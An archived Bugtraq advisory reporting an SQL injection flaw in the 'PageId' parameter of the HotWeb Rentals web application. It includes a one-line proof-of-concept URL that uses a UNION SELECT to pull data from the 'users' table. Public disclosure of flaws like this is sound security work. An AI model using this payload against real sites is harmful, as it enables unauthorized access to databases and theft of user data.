HotWeb Rentals "PageId" SQL Injection Vulnerability

From: non customers <non-customers@operamail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: HotWeb Rentals "PageId" SQL Injection Vulnerability
Date:


HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

-- 
non-customers crew | http://rock-madrid.com/




-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com






Copyright © 1995-2018 LinuxRocket.net. All rights reserved.